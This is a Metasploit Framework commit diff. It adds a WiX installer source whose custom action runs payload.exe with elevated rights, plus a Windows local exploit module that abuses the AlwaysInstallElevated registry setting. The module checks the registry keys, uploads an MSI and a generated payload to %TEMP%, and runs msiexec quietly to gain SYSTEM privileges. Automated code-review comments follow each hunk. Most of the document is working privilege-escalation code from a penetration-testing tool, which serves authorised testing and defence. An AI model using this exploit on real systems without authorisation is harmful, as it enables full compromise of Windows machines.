Merge branch 'master' of github.com:rapid7/metasploit-framework
commit
b2f906e83e
Binary file not shown.
|
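--- /dev/null
+++ b/external/source/exploits/exec_payload_msi/exec_payload.wxs
@@ -0,0 +1,29 @@
+<?xml version='1.0' encoding='windows-1252'?>
+<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
+<Product Name='Foobar 1.0' Id='*'
+Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
+
+<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />
+
+<Media Id='1' Cabinet='product.cab' EmbedCab='yes' />
+
+<Directory Id='TARGETDIR' Name='SourceDir'>
+<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
+<Condition>0</Condition>
+</Component>
+</Directory>
+
+<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
+<CustomAction Id='ExecNotepad' Directory='TARGETDIR' Impersonate='no' Execute='deferred' ExeCommand='[SourceDir]payload.exe' Return='asyncNoWait'/>
+
+<Feature Id='Complete' Level='1'>
+<ComponentRef Id='MyComponent' />
+</Feature>
+
+<InstallExecuteSequence>
+<ResolveSource After="CostInitialize" />
+<Custom Action="ExecNotepad" After="InstallInitialize" />
+</InstallExecuteSequence>
+
+</Product>
+</Wix>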
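Review bot: The custom action is still named `ExecNotepad` at `<CustomAction Id='ExecNotepad' ...>` and `<Custom Action="ExecNotepad" ...>` although what it runs is `[SourceDir]payload.exe`, so the identifier no longer describes the action; renaming both occurrences (for example `ExecPayload`) keeps the source readable. The component `Guid='12345678-1234-1234-1234-123456789012'` is a visibly hand-typed placeholder rather than a generated GUID; since `<Condition>0</Condition>` keeps the component from ever being installed this presumably has no effect, but a comment such as `<!-- dummy component, never installed (Condition 0); GUID is a placeholder -->` would stop a reader from treating it as a real component identity. The file is complete within this hunk.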
@ -95,7 +95,7 @@ class Msf::Module::SiteReference < Msf::Module::Reference
|
|||
if (in_ctx_id == 'OSVDB')
|
||||
self.site = 'http://www.osvdb.org/' + in_ctx_val.to_s
|
||||
elsif (in_ctx_id == 'CVE')
|
||||
self.site = 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=' + in_ctx_val.to_s
|
||||
self.site = "http://cvedetails.com/cve/#{in_ctx_val.to_s}/"
|
||||
elsif (in_ctx_id == 'BID')
|
||||
self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
|
||||
elsif (in_ctx_id == 'MSB')
|
||||
|
|
|
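Review bot: In the added `self.site = "http://cvedetails.com/cve/#{in_ctx_val.to_s}/"` the `.to_s` inside the interpolation is redundant, because string interpolation already calls `to_s`; `self.site = "http://cvedetails.com/cve/#{in_ctx_val}/"` is the idiomatic form. The neighbouring branches build their URLs with `'...' + in_ctx_val.to_s`, so the new line also leaves one if/elsif chain mixing two styles; either is fine, but one should be used throughout. The value is interpolated unescaped, which is acceptable while `in_ctx_val` comes from module-authored reference metadata, but worth a `# in_ctx_val is trusted module metadata, not user input` comment so that assumption is visible. The enclosing method starts and ends outside this hunk.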
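--- /dev/null
+++ b/PATH_NOT_SHOWN_ON_PAGE.rb
@@ -0,0 +1,178 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/registry'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+
+class Metasploit3 < Msf::Exploit::Local
+Rank = AverageRanking
+
+include Msf::Exploit::EXE
+include Msf::Post::Common
+include Msf::Post::File
+include Msf::Post::Windows::Registry
+
+def initialize(info={})
+super(update_info(info, {
+'Name' => 'Windows AlwaysInstallElevated MSI',
+'Description' => %q{
+This module checks the AlwaysInstallElevated registry keys which dictate if
+.MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
+
+The default MSI file is data/exploits/exec_payload.msi with the WiX source file
+under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply
+executes payload.exe within the same folder.
+
+The MSI may not execute succesfully successive times, but may be able to get around
+this by regenerating the MSI.
+
+MSI can be rebuilt from the source using the WIX tool with the following commands:
+candle exec_payload.wxs
+light exec_payload.wixobj
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Ben Campbell',
+'Parvez Anwar' # discovery?/inspiration
+],
+'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+'Platform' => [ 'win' ],
+'SessionTypes' => [ 'meterpreter' ],
+'DefaultOptions' =>
+{
+'WfsDelay' => 10,
+'EXITFUNC' => 'thread',
+'InitialAutoRunScript' => 'migrate -k -f'
+},
+'Targets' =>
+[
+[ 'Windows', { } ],
+],
+'References' =>
+[
+[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
+[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
+[ 'URL', 'http://wix.sourceforge.net'] ,
+],
+'DisclosureDate'=> 'Mar 18 2010',
+'DefaultTarget' => 0
+}))
+
+register_advanced_options([
+OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
+OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
+], self.class)
+end
+
+def check
+install_elevated = "AlwaysInstallElevated"
+installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
+hkcu = "HKEY_CURRENT_USER\\#{installer}"
+hklm = "HKEY_LOCAL_MACHINE\\#{installer}"
+
+local_machine_value = registry_getvaldata(hklm,install_elevated)
+
+if local_machine_value.nil?
+print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
+return Msf::Exploit::CheckCode::Safe
+elsif local_machine_value == 0
+print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
+return Msf::Exploit::CheckCode::Safe
+else
+print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
+current_user_value = registry_getvaldata(hkcu,install_elevated)
+end
+
+if current_user_value.nil?
+print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
+return Msf::Exploit::CheckCode::Safe
+elsif current_user_value == 0
+print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+return Msf::Exploit::CheckCode::Safe
+else
+print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
+return Msf::Exploit::CheckCode::Vulnerable
+end
+end
+
+def cleanup
+if not @executed
+return
+end
+
+begin
+print_status("Deleting MSI...")
+file_rm(@msi_destination)
+rescue Rex::Post::Meterpreter::RequestError => e
+print_error(e.to_s)
+print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
+end
+
+begin
+print_status("Deleting Payload...")
+file_rm(@payload_destination)
+rescue Rex::Post::Meterpreter::RequestError => e
+print_error(e.to_s)
+print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
+end
+end
+
+def exploit
+
+if check != Msf::Exploit::CheckCode::Vulnerable
+@executed = false
+return
+end
+
+@executed = true
+
+msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
+msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
+
+# Upload MSI
+@msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
+print_status("Uploading the MSI to #{@msi_destination} ...")
+
+#upload_file - ::File.read doesn't appear to work in windows...
+source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
+write_file(@msi_destination, source)
+
+# Upload payload
+payload = generate_payload_exe
+@payload_destination = expand_path("%TEMP%\\payload.exe").strip
+print_status("Uploading the Payload to #{@payload_destination} ...")
+write_file(@payload_destination, payload)
+
+# Execute MSI
+print_status("Executing MSI...")
+
+if datastore['LOG_FILE'].nil?
+logging = ""
+else
+logging = "/l* #{datastore['LOG_FILE']} "
+end
+
+if datastore['QUIET']
+quiet = "/quiet "
+else
+quiet = ""
+end
+
+cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
+vprint_status("Executing: #{cmd}")
+begin
+result = cmd_exec(cmd)
+rescue Rex::TimeoutError
+vprint_status("Execution timed out.")
+end
+vprint_status("MSI command-line feedback: #{result}")
+end
+end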
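Review bot: The msiexec command line built at `cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"` interpolates the expanded %TEMP% path and the LOG_FILE option without quotes, so a path that contains a space (a per-user temp directory may) splits into separate arguments and msiexec cannot find the package or writes its log to the wrong place. Quoting both fixes it: `logging = "/l* \"#{datastore['LOG_FILE']}\" "` and `cmd = "msiexec.exe #{logging}#{quiet}/package \"#{@msi_destination}\""`. Separately, when `cmd_exec` raises Rex::TimeoutError the rescue leaves `result` nil and the following `vprint_status("MSI command-line feedback: #{result}")` reports empty feedback as if the command returned nothing; a `return` in the rescue, or `vprint_status(...) if result`, keeps the output honest. The `check` method compares `local_machine_value == 0`, which assumes `registry_getvaldata` returns an Integer for a REG_DWORD — worth a comment stating that assumption. The whole `exploit` method lies inside this hunk.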